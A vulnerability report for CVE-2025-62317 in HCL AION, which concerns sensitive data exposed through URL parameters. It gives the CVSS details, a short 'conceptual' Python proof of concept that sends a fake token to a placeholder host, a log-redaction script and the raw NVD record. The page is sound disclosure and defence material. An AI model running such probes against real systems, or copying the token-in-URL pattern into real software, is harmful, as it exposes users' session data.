Security Vulnerability Report
CVE-2025-62317 CVSS 2.6 LOW

CVE-2025-62317

Published: 2026-05-14 17:16:19
Last Modified: 2026-05-14 17:22:47

Description

HCL AION is affected by a vulnerability where sensitive information may be included in URL parameters. Passing sensitive data in URLs may expose it through browser history, logs, or intermediary systems, potentially leading to unintended information disclosure under certain conditions.

CVSS Details

CVSS Score: 2.6
Severity: LOW
CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

HCL AION (for the specific affected versions, refer to the official advisory KB0130636)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Conceptual Proof of Concept for CVE-2025-62317
# This script demonstrates how sensitive data in URL parameters can be exposed.
import requests


def check_sensitive_data_leak():
    target_domain = "http://vulnerable-hcl-aion.local"
    endpoint = "/account/details"

    # Simulating a vulnerable request where sensitive data is in URL
    # Example: Session token or user ID passed via GET
    sensitive_token = "sess_id_987654321_sensitive"
    user_id = "admin_user"

    # Constructing the vulnerable URL
    full_url = f"{target_domain}{endpoint}?token={sensitive_token}&uid={user_id}"
    print(f"[+] Sending request to: {full_url}")

    try:
        # A timeout keeps the script from hanging on an unreachable host
        response = requests.get(full_url, timeout=10)
        if response.status_code == 200:
            print("[+] Request successful. The URL containing sensitive data is now logged in:")
            print(" - Browser History")
            print(" - Proxy/Server Logs")
            print(" - Referer headers (if links are clicked)")
            print(f"[!] Sensitive Data Exposed: {sensitive_token}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except requests.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    check_sensitive_data_leak()
```
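On the defensive side, the following is an added example (not part of the original page or of HCL's advisory): a scrubber that finds and redacts sensitive query parameters in web access logs, covering both the request line and the Referer field. The Combined Log Format, the parameter list and the sample lines are assumptions; `token`, `uid` and the host name are taken from the conceptual PoC above.

```python
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Assumed list of sensitive parameter names; "token" and "uid" come from the
# conceptual PoC on this page, the rest are illustrative.
SENSITIVE_PARAMS = {"token", "uid", "password", "session", "apikey"}

# Combined Log Format: request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<pre>\S+ \S+ \S+ \[[^\]]+\] ")(?P<method>[A-Z]+) (?P<target>\S+) '
    r'(?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def redact_url(url):
    """Return (redacted_url, sorted names of sensitive params found)."""
    parts = urlsplit(url)
    found, pairs = set(), []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in SENSITIVE_PARAMS:
            found.add(name.lower())
            value = "REDACTED"
        pairs.append((name, value))
    if not found:
        return url, []           # nothing sensitive: return the URL unchanged
    return urlunsplit(parts._replace(query=urlencode(pairs))), sorted(found)

def scrub_line(line):
    """Redact sensitive query params in the request target and Referer."""
    m = LOG_RE.match(line)
    if not m:
        return line, []          # not Combined Log Format: leave untouched
    target, hits_t = redact_url(m["target"])
    referer, hits_r = redact_url(m["referer"])
    findings = [("request", n) for n in hits_t] + [("referer", n) for n in hits_r]
    clean = (f'{m["pre"]}{m["method"]} {target} {m["proto"]}" {m["status"]} '
             f'{m["size"]} "{referer}" "{m["agent"]}"')
    return clean, findings

# Constructed sample lines (not real traffic).
SAMPLE = [
    '10.0.0.5 - - [14/May/2026:17:16:19 +0000] "GET /account/details?token=sess_id_987654321_sensitive&uid=admin_user HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [14/May/2026:17:16:25 +0000] "GET /static/app.css HTTP/1.1" 200 90 "http://vulnerable-hcl-aion.local/account/details?token=sess_id_987654321_sensitive&uid=admin_user" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for raw in SAMPLE:
        clean, findings = scrub_line(raw)
        print(findings, clean, sep="\n")
```

Scrubbing logs limits where already-leaked values persist; the underlying fix for CWE-598 is to move such values out of the URL, for example into a request body or header.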

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62317", "sourceIdentifier": "[email protected]", "published": "2026-05-14T17:16:19.107", "lastModified": "2026-05-14T17:22:46.577", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL AION is affected by a vulnerability where sensitive information may be included in URL parameters. Passing sensitive data in URLs may expose it through browser history, logs, or intermediary systems, potentially leading to unintended information disclosure under certain conditions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:C/C:L/I:N/A:N", "baseScore": 2.6, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-598"}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130636", "source": "[email protected]"}]}}